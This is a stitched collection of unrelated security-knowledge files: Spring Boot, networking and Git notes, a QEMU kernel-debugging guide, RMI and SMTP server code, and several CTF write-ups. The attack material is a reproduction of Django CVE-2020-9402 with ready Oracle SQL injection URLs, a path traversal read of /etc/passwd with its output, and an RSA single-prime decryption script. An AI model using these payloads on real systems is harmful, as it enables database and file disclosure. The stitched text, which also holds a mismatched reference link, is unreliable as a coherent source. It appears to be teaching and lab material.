完成了要转换的对象之后,可以编写一个接口来接收xml并返回xml,比如: ```java @Controller public class UserController { @PostMapping(value = "/user", consumes = MediaType.APPLICATION_XML_VALUE, produces = MediaType.APPLICATION_XML_VALUE) @ResponseBody public User create(@RequestBody User user) { user.setName("didispace.com : " + user.getName()); user.setAge(user.getAge() + 100); return user; } } ``` --- ## Source & Reference - [Spring Boot 2.x基础教程:构建RESTful API与单元测试](https://blog.didispace.com/spring-boot-learning-21-2-1/) - [Spring Boot 2.x基础教程:使用Swagger2构建强大的API文档](https://blog.didispace.com/spring-boot-learning-21-2-2/) - [Spring Boot 2.x基础教程:JSR-303实现请求参数校验](https://blog.didispace.com/spring-boot-learning-21-2-3/) - [spring boot中使用Bean Validation做优雅的参数校验](https://blog.csdn.net/w57685321/article/details/106783433) - [Spring Boot 2.x基础教程:Swagger接口分类与各元素排序问题详解](https://blog.didispace.com/spring-boot-learning-21-2-4/) - [Spring Boot 2.x基础教程:Swagger静态文档的生成](https://blog.didispace.com/spring-boot-learning-21-2-5/) - [Spring Boot 2.x基础教程:找回启动日志中的请求路径列表](https://blog.didispace.com/spring-boot-learning-21-2-6/) - [Spring Boot 2.x基础教程:使用SpringFox 3生成Swagger文档](https://blog.didispace.com/spring-boot-learning-21-2-7/) - [Spring Boot 2.x基础教程:如何扩展XML格式的请求和响应](https://blog.didispace.com/spring-boot-learning-21-2-8/)
sec-knowleage
# 计算机网络 - [概述](计算机网络%20-%20概述.md) - [物理层](计算机网络%20-%20物理层.md) - [链路层](计算机网络%20-%20链路层.md) - [网络层](计算机网络%20-%20网络层.md) - [传输层](计算机网络%20-%20传输层.md) - [应用层](计算机网络%20-%20应用层.md) ## 参考链接 - 计算机网络, 谢希仁 - JamesF.Kurose, KeithW.Ross, 库罗斯, 等. 计算机网络: 自顶向下方法 [M]. 机械工业出版社, 2014. - W.RichardStevens. TCP/IP 详解. 卷 1, 协议 [M]. 机械工业出版社, 2006. - [Active vs Passive FTP Mode: Which One is More Secure?](https://securitywing.com/active-vs-passive-ftp-mode/) - [Active and Passive FTP Transfers Defined - KB Article #1138](http://www.serv-u.com/kb/1138/active-and-passive-ftp-transfers-defined) - [Traceroute](https://zh.wikipedia.org/wiki/Traceroute) - [ping](https://zh.wikipedia.org/wiki/Ping) - [How DHCP works and DHCP Interview Questions and Answers](http://webcache.googleusercontent.com/search?q=cache:http://anandgiria.blogspot.com/2013/09/windows-dhcp-interview-questions-and.html) - [What is process of DORA in DHCP?](https://www.quora.com/What-is-process-of-DORA-in-DHCP) - [What is DHCP Server ?](https://tecadmin.net/what-is-dhcp-server/) - [Tackling emissions targets in Tokyo](http://www.climatechangenews.com/2011/html/university-tokyo.html) - [What does my ISP know when I use Tor?](http://www.climatechangenews.com/2011/html/university-tokyo.html) - [Technology-Computer Networking[1]-Computer Networks and the Internet](http://www.linyibin.cn/2017/02/12/technology-ComputerNetworking-Internet/) - [P2P 网络概述.](http://slidesplayer.com/slide/11616167/) - [Circuit Switching (a) Circuit switching. (b) Packet switching.](http://slideplayer.com/slide/5115386/)
sec-knowleage
# Hummel (misc, 100p, 56 solved) In the challenge we get a [video](challenge.mp4) with farting unicorn. It's easy to notice that there are short and long farts, and that there are some spaces in between. The first observation could mean some binary encoding, but the second observation suggest something like Morse code, and it's a right guess. ![](morse.png) We extracted the soundtrack, loaded into Audacity and typed down the code: `.--. --- . - .-. -.-- .. -. ... .--. .. .-. . -.. -... -.-- -... .- -.- . -.. -... . .- -. ...` which gives the flag: `hackover18{poetry inspired by baked beans}`
sec-knowleage
# H4CK1NG G00GL3 Writeups for the [H4CK1NG G00GL3 CTF](https://h4ck1ng.google/). The CTF was accompanied by a series of [videos](https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H) (or vice versa 🙂). ![](images/main_chal.png) ![](images/loot.png)
sec-knowleage
import java.rmi.Naming; import java.rmi.Remote; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.server.UnicastRemoteObject; import java.util.List; public class RemoteRMIServer { private void start() throws Exception { if (System.getSecurityManager() == null) { System.out.println("setup SecurityManager"); System.setSecurityManager(new SecurityManager()); } Calc h = new Calc(); LocateRegistry.createRegistry(1099); Naming.rebind("refObj", h); } public static void main(String[] args) throws Exception { new RemoteRMIServer().start(); } }
sec-knowleage
# 1-基本分析 --- 目标 T1.exe 使用 IDA 打开 **找 main 函数** 先运行一下该程序 可以发现该程序要求输入一个字符串,输入1直接退出。说明该题要求找到正确的输入使程序运行结果不为"you are wrong!" C语言的入口函数是 main 函数,main 符号名在编译阶段已经删除,如何在该程序的 5385 个函数中找到 main 函数呢?这时候就需要用到【代码定位】技巧中的【字符串定位】。 通过运行 T1.exe 程序,我们已知该程序会输出 ``` Hi CTFer,Input your flag: you are wrong! ``` 等字符串,我们可以搜索这些字符串,来找到引用这些字符串的代码。 菜单 View -> Open SubViews -> Strings,ctrl+f, 输入 Hi CTFer,双击跳转到相应位置 单击 aHiCtferInputYo 标识符名字,按 X 找到引用 aHiCtferInputYo 标识符的代码,跳转到目标 直接跳转过去后是汇编代码,按 tab 将这段代码转换成伪代码 根据伪代码逻辑分析 - sub_45A1C0 是 main - sub_456502 是 printf 或 puts - sub_4554EF 是 scanf - sub_454086 是 strcmp 还原结果类似如下: 如果输入与 flag{YOU_FIND_IT} 相等,则 strcmp 返回 0,否则返回非0。 strcmp 返回 0 则执行 printf("you are right!\n"); --- **Source & Reference** - [萌新学逆向——T1 IDA的正确开启姿势](https://mp.weixin.qq.com/s/I9vJp8fp7RcCls0tz8Dvlg)
sec-knowleage
# Off the rails Category: Cryptography ## Description > ht35cn3tk_u}eib34tBcto{R7H_sn_e ## Solution The name of the challenge is a hint for the cipher used to encrypt the flag: Rail Fence Cipher. [This](https://www.boxentriq.com/code-breaking/rail-fence-cipher) site can decode it using 5 rails and an offset of 3: `cstechnion{b3tt3R_74k3_tHe_Bu5}`.
sec-knowleage
# Django GIS functions and aggregates on Oracle SQL Injection Vulnerability (CVE-2020-9402) [中文版本(Chinese version)](README.zh-cn.md) Django released a security update on March 4, 2020, which fixes a SQL injection vulnerability in the GIS functions and aggregates. Reference link: - https://www.djangoproject.com/weblog/2020/mar/04/security-releases/ The vulnerability requires the developer to use JSONField/HStoreField; moreover, the field name of the queryset can be controlled. Django's built-in application Django-Admin is affected, which gives us an easy way to reproduce the vulnerability. ## Start Vulnerability Application Compile and start a vulnerable Django 3.0.3 by executing the following command: ``` docker compose build docker compose up -d ``` After the environment is started, you can see the home page of Django at `http://your-ip:8000`. ## Vulnerability Reproduce First, assess the website `http://your-ip:8000/vuln/` Then add `20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1` to the GET para,eter, where q is the quertset: http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 You can see that the bracket has been injected successfully, and the SQL statement reports an error: ![](1.png) Or you can assess the other website `http://your-ip:8000/vuln2/`, and add `0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --` to the GET para,eter, where q is the quertset: http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20-- You can also see that the SQL statement reports an error: ![](2.png)
sec-knowleage
# Qemu 模拟环境 这一章节主要介绍如何使用 QEMU 来搭建调试分析环境。为了使用 qemu 启动和调试内核,我们需要内核、qemu、文件系统。 ## 准备 ### 内核 这个在之前已经编译完成了。 ### QEMU 关于 QEMU 的介绍与安装请参考 `ctf-tools`。 ### 文件系统 这里我们使用 busybox 来构建一个简单的文件系统。 #### 下载编译 busybox ##### 下载 busybox ```bash ❯ wget https://busybox.net/downloads/busybox-1.32.1.tar.bz2 ❯ tar -jxf busybox-1.32.1.tar.bz2 ``` ##### 配置 ```bash ❯ make menuconfig ``` 在 Setttings 选中 Build static binary (no shared libs),将 busybox 编译为静态链接的文件;在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux < 2.6.23 (NEW);在 Networking Utilities 中取消选中 inetd。 ##### 编译 ```bash make -j3 ``` #### 配置文件系统 使用 busybox 创建 `_install` 目录,使用命令: ```bash make install ``` 在编译完成后,我们在 `_install` 目录下创建以下文件夹 ```bash ❯ mkdir -p proc sys dev etc/init.d ``` 并创建 `init` 作为 linux 的启动脚本,内容为 ```bash #!/bin/sh echo "INIT SCRIPT" mkdir /tmp mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs none /dev mount -t debugfs none /sys/kernel/debug mount -t tmpfs none /tmp echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds" setsid /bin/cttyhack setuidgid 1000 /bin/sh ``` 将脚本加上可执行权限,以便于执行。 ```bash ❯ chmod +x init ``` 之后在 `_install` 目录下打包整个文件系统 ```bash ❯ find . | cpio -o --format=newc > ../rootfs.img 5367 blocks ``` 当然,我们还可以使用如下的命令重新解包文件系统 ```shell cpio -idmv < rootfs.img ``` ## 启动内核 这里以前面编译好的 Linux 内核、文件系统镜像为例来介绍如何启动内核。我们可以直接使用下面的脚本来启动 Linux 内核 ```bash #!/bin/sh qemu-system-x86_64 \ -m 64M \ -nographic \ -kernel ./bzImage \ -initrd ./rootfs.img \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr" \ -smp cores=2,threads=1 \ -cpu kvm64 ``` 启动后的效果如下 ```bash Boot took 2.05 seconds / $ [ 2.265131] tsc: Refined TSC clocksource calibration: 2399.950 MHz [ 2.265561] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2298086d749, max_idle_ns: 440795294037 ns [ 2.266131] clocksource: Switched to clocksource tsc / $ / $ ls bin etc linuxrc root sys usr dev init proc sbin tmp ``` 在没有设置 monitor 时,我们可以使用`ctrl-a+c` 来进入 monitor,可以看到 monitor 提供了很多命令。 ```bash / $ QEMU 5.2.0 monitor - type 'help' for more information (qemu) help acl_add aclname match allow|deny [index] -- add a match rule to the access control list acl_policy aclname allow|deny -- set default access control list policy acl_remove aclname match -- remove a match rule from the access control list acl_reset aclname -- reset the access control list acl_show aclname -- list rules in the access control list ... ``` 在用 qemu 启动内核时,常用的选项如下 - -m, 指定RAM大小,默认 384M - -kernel,指定内核镜像文件 bzImage 路径 - -initrd,设置内核启动的内存文件系统 - `-smp [cpus=]n[,cores=cores][,threads=threads][,dies=dies][,sockets=sockets][,maxcpus=maxcpus]`,指定使用到的核数。 - -cpu,指定指定要模拟的处理器架构,可以同时开启一些保护,如 - +smap,开启 smap 保护 - +smep,开启 smep 保护 - -nographic,表示不需要图形界面 - -monitor,对 qemu 提供的控制台进行重定向,如果没有设置的话,可以直接进入控制台。 - -append,附加选项 - `nokaslr` 关闭随机偏移 - console=ttyS0,和 `nographic` 一起使用,启动的界面就变成了当前终端。 ## 加载驱动 当然,我们还可以加载之前编译的驱动。将生成的 ko 文件拷贝到 busybox 的 `_install` 目录下,然后对启动脚本进行修改,添加 `insmod /ko_test.ko` ,具体如下 ```bash #!/bin/sh echo "INIT SCRIPT" mkdir /tmp mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs none /dev mount -t debugfs none /sys/kernel/debug mount -t tmpfs none /tmp insmod /ko_test.ko echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds" setsid /bin/cttyhack setuidgid 1000 /bin/sh poweroff -f ``` qemu 启动内核后,我们可以使用 dmesg 查看输出,可以看到确实加载了对应的 ko。 ``` [ 2.019440] ko_test: loading out-of-tree module taints kernel. [ 2.020847] ko_test: module verification failed: signature and/or required key missing - tainting kernel [ 2.025423] This is a test ko! ``` ## 调试分析 这里我们简单介绍一下如何调试内核。 ### 调试建议 为了方便调试,我们可以使用 root 用户启动 shell,即修改 init 脚本中对应的代码 ```shell - setsid /bin/cttyhack setuidgid 1000 /bin/sh + setsid /bin/cttyhack setuidgid 0 /bin/sh ``` 此外,我们还可以在启动时,指定内核关闭随机化 ```bash #!/bin/sh qemu-system-x86_64 \ -m 64M \ -nographic \ -kernel ./bzImage \ -initrd ./rootfs.img \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr" \ -smp cores=2,threads=1 \ -cpu kvm64 ``` ### 基本操作 获取内核特定符号地址 ```bash grep prepare_kernel_cred /proc/kallsyms grep commit_creds /proc/kallsyms ``` 查看装载的驱动 ```bash lsmod ``` 获取驱动加载的基地址 ```bash # method 1 grep target_module_name /proc/modules # method 2 cat /sys/module/target_module_name/sections/.text ``` /sys/module/ 目录下存放着加载的各个模块的信息。 ### 启动调试 qemu 其实提供了调试内核的接口,我们可以在启动参数中添加 `-gdb dev` 来启动调试服务。最常见的操作为在一个端口监听一个 tcp 连接。 QEMU 同时提供了一个简写的方式 `-s`,表示 `-gdb tcp::1234`,即在 1234 端口开启一个 gdbserver。 当我们以调试模式启动内核后,我们就可以在另外一个终端内使用如下命令来连接到对应的 gdbserver,开始调试。 ```bash gdb -q -ex "target remote localhost:1234" ``` 在启动内核后,我们可以使用 `add-symbol-file` 来添加符号信息,比如 ``` add-symbol-file vmlinux addr_of_vmlinux add-symbol-file ./your_module.ko addr_of_ko ``` 当然,我们也可以添加源码目录信息。这些就和用户态调试没什么区别了。 ## 参考 - https://www.ibm.com/developerworks/cn/linux/l-busybox/index.html - https://qemu.readthedocs.io/en/latest/system/qemu-manpage.html - http://blog.nsfocus.net/gdb-kgdb-debug-application/
sec-knowleage
--- title: 对情报收集工作的展望 --- # 情报研究方法论——对情报收集工作的展望 此篇整理一些关于情报研究的方法论。主要为自情报收集工作的一些思考,后续更新更多关于情报研究的方法论。因为情报学科是一个“古老”的学科,而威胁情报则是前者在当下网络空间里的一个新生产物。研究威胁情报的过程也是需要对情报研究的方法论有一定积淀。 ## 情报收集源 以下是一个从分析师的视角出发,对情报收集的分类思路。主要分为文字情报和非文字情报。 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915072210.png) 图:Analyst’s Functional View of Intelligence Collection[1] ## 情报收集的结构和过程 ### 循环的视角 情报的收集通常被描述为一个循环,以下是情报采集的过程视图,主要把情报的采集分成两个部分:“前端”和“后端”: - 前端:包含需求和任务 - 中间动作:收集 - 后端:开发、加工和传播 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915073439.png) 图1:Collector’s Process View[1] 如上图所示,情报收集被抽象化为一个标准的循环,但在实际的情报收集过程中,这种循环是很可能不完美的,会有一些“跳跃”的情况。总的来说,上图展示的情报收集过程是个简化的理想版过程。哇·· ### 模块化的视角 以下是一个模块化视角的情报收集过程。在这个视图中,不同的威胁集合被当作不同的管道(stovepipes),每个管道都具有图1中的变体,也就是其中的每个威胁集合/模块都有一个单独存在的循环过程。并且每个管道都会产生出不同的情报产品(intelligence product)。这种视图细颗粒度更高,对分析师更具指导意义。 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915073719.png) 图2:Analyst’s Process View[1] ### 指向性收集 还有一种思路是对情报源中所需要的部分进行“精品”收集。但通常来说这种指向性收集的成本(人力成本和资源成本)都比较高。并且还需要更多的加工和处理。PS:此处可能有疑惑,如果进行“精品”收集,那么收集到了的不应该是质量较高的吗?这个的话,我的理解是,指向性收集就像奢侈品制造时进行原料选择一样,由于这个产品的**需求定位**,就导致了这种“精品”不仅要求更高的原料质量,还需要更加细致的加工,而不是只有好的原料。 如图2所示,金橙色的部分通常为大规模采集,而蓝色的部分部分则是这种指向性收集,要求分析师更加直接地参与。 ## 边界问题 ### 单源分析 在美国,国家情报收集组织执行所谓的单一来源分析。[1] 简单讲就是什么部门负责什么类型的情报收集和分析,国家安全局(NSA)手机分析通信情报(COMINT)、国家地理空间情报局(NGA)收集处理图像情报(IMINT),开源中心(OSC)收集处理开源情报(OSINT)。对于这些主体来说,除了他们主要负责的情报外,其他的情报都为附属情报。 ### 多源分析 > 一些国家机构和军事服务单位负责制作所有来源分析。例如,中央情报局(CIA),国防情报局(DIA),国土安全部(DHS)和国务院都有责任在国家层面提供所有来源分析。[1] 通常来说,多源分析的主体,对于国家层面上来说,更可能是国家中心机构和军事单位,而不是具体的职能部门。 ### 产生的边界问题 那么,这种单源和多源的区别,会有什么样的影响呢? - 单源分析师的成果对全源分析师有一定帮助,并且通常来说,后者的工作量更大些 - 竞争分析:该理念主要是围绕着对原材料进行全新的不同观点的理念而构建的。[1] 对于同一组数据,不同的视角会看到不同重要程度的东西 - 多情报融合:有充分理由鼓励而不是劝阻单一来源分析师倾向于进行全源分析[1] - 单源分析师很难在单一数据源的情况下完成目标需求 ### 个人的思考 在该论文中提到的多情报融合和竞争分析概念,可以作为新型情报分析体系建设的一个参考。回到我们的威胁情报来说,这种单源和多源的边界问题还是经常会出现的。比如对黑灰产情报研究的同学,在进行分析时,可能会去看一些漏洞情报,因为这种漏洞情报中的一部分业务逻辑情况,对黑灰产情报发现是有帮助的。那么怎么才能推进这种多情报融合体系建设呢? 个人任务,得从两种角度上来看,首先是目的,其实是结果。 目的上来说,我们得理清楚情报的融合是为了什么,这种目的不能是我觉得这可能有用就去推动,得给出一个具体的技术方向。比如黑灰产情报研究线,我们可以串联:黑产发现情报、业务风控情报、黑产打击情报(响应情报)、漏洞情报(部分)以及第三方的威胁情报支持。在串联之后,就要进行威胁交换,推动多源的情报进行融合和关联。具体怎么做呢?可以参考论文中所说的“竞争分析”概念。在拿到一个黑灰产情报分析的需求后,黑灰产情报研究线上的各个主体,要围绕着原材料进行基于各自领域的,以及尝试全新的、不同的观念的分析。 这种过程之下,可以推动单源向多源获取更多的材料,多源向单源获取更多的想法。从而减少边界问题带来的各种弊端。 ## 总结 总的来说,该篇论文介绍了美国情报界的情报收集、处理系统。也提出了一些问题,主要是对边界问题、命名问题。可以看到,美国的这个情报体系的建设,参与的主体还是非常多的,并且体系相对庞大、完善。 学习这种情报体系的建设,在企业的角度上来说,可以从国家层面上情报体系建设的问题获取一些灵感,因为国家也可以说是一个超大型企业。在这篇论文中,我获得一些灵感主要是其提到的多情报融合和竞争分析的概念,这对于威胁情报体系建设,尤其是威胁情报本地化生产和交换的过程具有参考价值。 ## References \[1] Perspectives on Intelligence Collection, Robert M. Clark, PhD
sec-knowleage
#!/usr/bin/python import os import hashlib import subprocess import time def menu(): print """ 1. Read Trump article 2. Run Trump Money Simulator 3. Quit """ try: res = int(raw_input()) if res <= 0 or res > 3: return -1 else: return res except: return -1 def read_tweet(): print "Read the top 20 tweets by Trump!" print "Enter a number (1 - 20)" tweet_number = raw_input() time.sleep(5) try: with open("tweets/{0}".format(tweet_number), 'r') as f: print f.read() except: print "Invalid input!" def run_sim(): print "Trump's money simulator (that makes america great again) simulates two different sized states transfering money around, with the awesome Trump algorithm." print "The simulator takes in 2 inputs. Due to the awesomeness of the simulator, we can only limit the input to less than a thousand each..." input1 = raw_input("[Smaller] State 1 Size:") input2 = raw_input("[Larger] State 2 Size:") if len(input1) > 3 or len(input2) >3: print "Number has to be less than 1000" return str_to_hash = "[]{0}[]{1}##END".format(input1,input2) print "Hashing",repr(str_to_hash) sim_id = hashlib.sha256(str_to_hash).hexdigest() sim_name = "sims/sim-{0}".format(sim_id) if False:#os.path.isfile(sim_name): print "Sim compiled, running sim..." else: print "Compiling Sim" args=["clang", "-m32", "-DL1={}".format(input1), "-DL2={}".format(input2), "pound.c", "-o", sim_name] print args ret = subprocess.call(args) if ret != 0: print "Compiler error!" return #os.execve("/usr/bin/sudo", ["/usr/bin/sudo", "-u", "smalluser", sim_name], {}) os.execve(sim_name, [sim_name], {}) def main(): print "Welcome to the Trump Secret Portal" while 1: res = menu() if res == 1: read_tweet() elif res == 2: run_sim() elif res == 3: exit(0) if __name__ == "__main__": main()
sec-knowleage
# Github分支 ### 什么是分支? 分支就是科幻电影里面的平行宇宙,当你正在电脑前努力学习Git的时候,另一个你正在另一个平行宇宙里努力学习SVN。 如果两个平行宇宙互不干扰,那对现在的你也没啥影响。不过,在某个时间点,两个平行宇宙合并了,结果,你既学会了Git又学会了SVN! ![分支示例图片](../img/0.png) ### 分支管理 #### 查看本地分支 ``` git branch ``` #### 查看本地和远程分支 ``` git branch -a ``` > **小贴士**:`*`代表当前的分支 ``` $ git branch -a gh-pages * master remotes/origin/gh-pages remotes/origin/master ``` > **小贴士**:默认情况下,origin指向本地的代码库托管在Github上的版本 #### 创建分支 ``` git branch [branch-name] ``` #### 切换分支 ``` git checkout [branch-name] ``` #### 创建并切换分支 ``` git branch -b [branch-name] ``` #### 把分支推到远程分支 ``` git push -u origin [branch-name] ``` #### 删除本地分支 ``` Git branch -d [branch-name] ``` #### 删除远程版本 ``` git push origin :[branch-name] ``` #### 删除远程分支 ``` git branch -r -d origin/[branch-name] git push origin :[branch-name] ``` #### 合并指定分支到当前分支 ``` git merge [branch-name] ``` #### git reset --hard HEAD~ 删除最近版本,回到上个版本 #### git reset --hard HEAD 删除新的修改
sec-knowleage
import smtpd import asyncore,sys,time class CustomSMTPServer(smtpd.SMTPServer): def process_message(self, peer, mailfrom, rcpttos, data, **kwargs): r = data.decode("utf-8").split("\n") for l in r: if l.startswith("Subject:"): sys.stdout.write("[{0}] {1}\n".format(time.time(),l)) sys.stdout.flush() return # server = smtpd.DebuggingServer(('0.0.0.0', 1025), None) server = CustomSMTPServer(('0.0.0.0', 1025), None) sys.stdout.write("[+] Start SMTPServer on 0.0.0.0:1025\n") sys.stdout.flush() asyncore.loop()
sec-knowleage
## 装饰(Decorator) ### Intent 为对象动态添加功能。 ### Class Diagram 装饰者(Decorator)和具体组件(ConcreteComponent)都继承自组件(Component),具体组件的方法实现不需要依赖于其它对象,而装饰者组合了一个组件,这样它可以装饰其它装饰者或者具体组件。所谓装饰,就是把这个装饰者套在被装饰者之上,从而动态扩展被装饰者的功能。装饰者的方法有一部分是自己的,这属于它的功能,然后调用被装饰者的方法实现,从而也保留了被装饰者的功能。可以看到,具体组件应当是装饰层次的最低层,因为只有具体组件的方法实现不需要依赖于其它对象。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/6b833bc2-517a-4270-8a5e-0a5f6df8cd96.png"/> </div><br> ### Implementation 设计不同种类的饮料,饮料可以添加配料,比如可以添加牛奶,并且支持动态添加新配料。每增加一种配料,该饮料的价格就会增加,要求计算一种饮料的价格。 下图表示在 DarkRoast 饮料上新增新添加 Mocha 配料,之后又添加了 Whip 配料。DarkRoast 被 Mocha 包裹,Mocha 又被 Whip 包裹。它们都继承自相同父类,都有 cost() 方法,外层类的 cost() 方法调用了内层类的 cost() 方法。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/c9cfd600-bc91-4f3a-9f99-b42f88a5bb24.jpg" width="600"/> </div><br> ```java public interface Beverage { double cost(); } ``` ```java public class DarkRoast implements Beverage { @Override public double cost() { return 1; } } ``` ```java public class HouseBlend implements Beverage { @Override public double cost() { return 1; } } ``` ```java public abstract class CondimentDecorator implements Beverage { protected Beverage beverage; } ``` ```java public class Milk extends CondimentDecorator { public Milk(Beverage beverage) { this.beverage = beverage; } @Override public double cost() { return 1 + beverage.cost(); } } ``` ```java public class Mocha extends CondimentDecorator { public Mocha(Beverage beverage) { this.beverage = beverage; } @Override public double cost() { return 1 + beverage.cost(); } } ``` ```java public class Client { public static void main(String[] args) { Beverage beverage = new HouseBlend(); beverage = new Mocha(beverage); beverage = new Milk(beverage); System.out.println(beverage.cost()); } } ``` ```html 3.0 ``` ### 设计原则 类应该对扩展开放,对修改关闭:也就是添加新功能时不需要修改代码。饮料可以动态添加新的配料,而不需要去修改饮料的代码。 不可能把所有的类设计成都满足这一原则,应当把该原则应用于最有可能发生改变的地方。 ### JDK - java.io.BufferedInputStream(InputStream) - java.io.DataInputStream(InputStream) - java.io.BufferedOutputStream(OutputStream) - java.util.zip.ZipOutputStream(OutputStream) - java.util.Collections#checked[List|Map|Set|SortedSet|SortedMap]()
sec-knowleage
# Google CTF - Beginner's Quest (2021) Writeups for the 2021 Google CTF Beginner's Quest. ![](images/ctf.png)
sec-knowleage
# 47. 礼物的最大价值 [NowCoder](https://www.nowcoder.com/questionTerminal/72a99e28381a407991f2c96d8cb238ab) ## 题目描述 在一个 m\*n 的棋盘的每一个格都放有一个礼物,每个礼物都有一定价值(大于 0)。从左上角开始拿礼物,每次向右或向下移动一格,直到右下角结束。给定一个棋盘,求拿到礼物的最大价值。例如,对于如下棋盘 ``` 1 10 3 8 12 2 9 6 5 7 4 11 3 7 16 5 ``` 礼物的最大价值为 1+12+5+7+7+16+5=53。 ## 解题思路 应该用动态规划求解,而不是深度优先搜索,深度优先搜索过于复杂,不是最优解。 ```java public int getMost(int[][] values) { if (values == null || values.length == 0 || values[0].length == 0) return 0; int n = values[0].length; int[] dp = new int[n]; for (int[] value : values) { dp[0] += value[0]; for (int i = 1; i < n; i++) dp[i] = Math.max(dp[i], dp[i - 1]) + value[i]; } return dp[n - 1]; } ```
sec-knowleage
# The worst RSA joke (Crypto) In the task we get [public key](public.pem) and [ciphertext](flag.enc). The description of the task states that someone decided to use a single prime as modulus for RSA encryption. The difficulty of breaking RSA is based on the fact that the number of co-prime numbers to the modulus (so-called Euler's totient function) is secret. For a prime number this value is known and is simply `p-1`. For product of two co-prime numbers it is `(p-1)*(q-1)`, and here is the strength of RSA - in order to calculate this value we need to know prime factors of the modulus, and finding those is hard. In our case this whole problem doesn't exist, since we know `p` and therefore we know `p-1` as well. Therefore we can simply calculate the private key exponent as `modinv(e,p-1)` and decrypt the ciphertext. ```python import codecs from Crypto.PublicKey import RSA from crypto_commons.generic import bytes_to_long from crypto_commons.rsa.rsa_commons import modinv, rsa_printable def main(): with codecs.open("public.pem", "r") as input_file: pub = input_file.read() pub = RSA.importKey(pub) print(pub.e, pub.n) with codecs.open("flag.enc", 'r') as input_flag: data = input_flag.read().decode("base64") d = modinv(pub.e, pub.n-1) print(rsa_printable(bytes_to_long(data), d, pub.n)) main() ``` And we get `Flag{S1nGL3_PR1m3_M0duLUs_ATT4cK_TaK3d_D0wn_RSA_T0_A_Sym3tr1c_ALg0r1thm}`
sec-knowleage
# ADMIN UI PWN-RE ## Description: > The command you just found removed the Foobanizer 9000 from the DMZ. While scanning the network, you find a weird device called Tempo-a-matic. According to a Google search it's a smart home temperature control experience. The management interface looks like a nest of bugs. You also stumble over some gossip on the dark net about bug hunters finding some vulnerabilities and because the vendor didn't have a bug bounty program, they were sold for US$3.49 a piece. Do some black box testing here, it'll go well with your hat. > > nc mngmnt-iface.ctfcompetition.com 1337 ## Solution: Connecting to the provided server provides us the following service: ``` root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337 === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit ``` Let's read the release notes: ``` root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337 === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? Version0.2 # Release 0.2 - Updated library X to version 0.Y - Fixed path traversal bug - Improved the UX === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? Version0.3 # Version 0.3 - Rollback of version 0.2 because of random reasons - Blah Blah - Fix random reboots at 2:32 every second Friday when it's new-moon. === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit ``` So version 0.2 fixed a path traversal vulnerability and version 0.3 reverted the fix. Let's start looking for a known file: ``` === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../etc/passwd Error: No such file or directory === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../../etc/passwd Error: No such file or directory === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false user:x:1337:1337::/home/user: === Management Interface === 